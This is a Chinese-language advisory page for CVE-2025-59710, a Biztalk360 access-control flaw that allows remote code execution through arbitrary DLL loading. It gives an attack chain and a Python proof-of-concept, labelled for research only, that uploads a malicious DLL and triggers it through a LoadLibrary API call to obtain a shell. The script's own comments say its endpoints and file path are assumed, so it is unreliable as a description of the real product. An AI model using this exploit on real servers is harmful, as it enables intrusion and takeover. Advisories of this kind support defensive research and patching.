CVE-2025-59710 Biztalk360访问控制缺陷致远程代码执行

漏洞信息

漏洞编号

CVE-2025-59710

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Biztalk360

漏洞概述

Biztalk360 在 11.5 版本之前存在严重的访问控制缺陷。由于系统未正确校验用户权限，任何用户均可请求加载特定的 DLL 文件。在加载过程中，系统会自动调用 DLL 内部方法。攻击者利用此漏洞，可构造恶意 DLL 上传至服务器，并通过特定请求触发加载机制，最终导致服务器端远程代码执行，严重威胁系统安全。

技术细节

该漏洞源于 Biztalk360 应用程序中不正确的访问控制实现。在受影响版本中，系统存在一个功能接口，允许请求加载外部 DLL 文件，但未对请求发起者的身份进行有效验证。根据 CVSS 向量分析，攻击复杂度为低（AC:L），且无需特权（PR:N），仅需少量用户交互（UI:R，可能涉及点击链接或社会工程学引导）。攻击链的第一步是武器化，即编写一个恶意的 .NET DLL（因为 Biztalk360 是基于 .NET 的产品），其中包含旨在执行系统命令的代码。第二步是交付，攻击者需要将此 DLL 文件上传到 Biztalk360 服务器可访问的目录。第三步是利用，攻击者向易受攻击的端点发送特定的 HTTP 请求，指定加载该恶意 DLL。由于访问控制缺失，服务器进程会加载 DLL 并调用特定方法。此时，恶意代码在服务器权限下执行，攻击者即可获得系统的完全控制权，造成数据泄露、篡改或服务中断。

攻击链分析

STEP 1

1. 侦察

攻击者识别目标网络上运行 Biztalk360 的服务器，并确认其版本低于 11.5。

STEP 2

2. 武器化

攻击者编写一个恶意的 .NET DLL 文件，该文件包含旨在服务器上执行任意系统命令的代码（如反弹 Shell）。

STEP 3

3. 交付

攻击者利用应用程序的功能或相关漏洞，将恶意 DLL 文件上传到服务器可访问的目录中。

STEP 4

4. 利用

攻击者向存在漏洞的 API 端点发送特制的 HTTP 请求，请求加载已上传的恶意 DLL 文件。

STEP 5

5. 执行

服务器由于访问控制缺失，接受请求并加载 DLL，自动调用其中的恶意方法，导致攻击者在服务器上下文中执行代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_host = "http://vulnerable-biztalk360-server"
upload_endpoint = f"{target_host}/api/upload"
load_dll_endpoint = f"{target_host}/api/Operations/LoadLibrary"

# Path to the crafted malicious DLL
malicious_dll_path = "./ExploitPayload.dll"

def exploit():
    try:
        # Step 1: Upload the malicious DLL to the server
        # Note: The actual upload mechanism might require specific parameters or headers
        print("[+] Uploading malicious DLL...")
        with open(malicious_dll_path, 'rb') as f:
            files = {'file': ('ExploitPayload.dll', f, 'application/octet-stream')}
            upload_response = requests.post(upload_endpoint, files=files)
            
        if upload_response.status_code != 200:
            print(f"[-] Upload failed: {upload_response.text}")
            return

        # Assuming the server saves the file to a predictable path
        # This path often needs to be guessed or disclosed via other vulnerabilities
        dll_path = "C:\\inetpub\\wwwroot\\BizTalk360\\Uploads\\ExploitPayload.dll"
        
        # Step 2: Trigger the DLL Loading vulnerability
        print(f"[+] Triggering DLL load from: {dll_path}")
        payload_data = {
            "assemblyPath": dll_path,
            "className": "ExploitClass",
            "methodName": "Execute"
        }
        
        exploit_response = requests.post(load_dll_endpoint, json=payload_data)
        
        if exploit_response.status_code == 200:
            print("[+] Exploit request sent successfully. Check your listener for shell.")
        else:
            print(f"[-] Exploit trigger failed: {exploit_response.text}")
            
    except Exception as e:
        print(f"[!] An error occurred: {str(e)}")

if __name__ == "__main__":
    exploit()

影响范围

Biztalk360 < 11.5

防御指南

临时缓解措施

在无法立即升级的情况下，建议通过网络访问控制列表（ACL）严格限制对 Biztalk360 管理端口的访问，仅允许受信任的 IP 地址连接。同时，应监控服务器日志中是否存在异常的 DLL 加载请求或文件上传行为，并及时阻断可疑连接。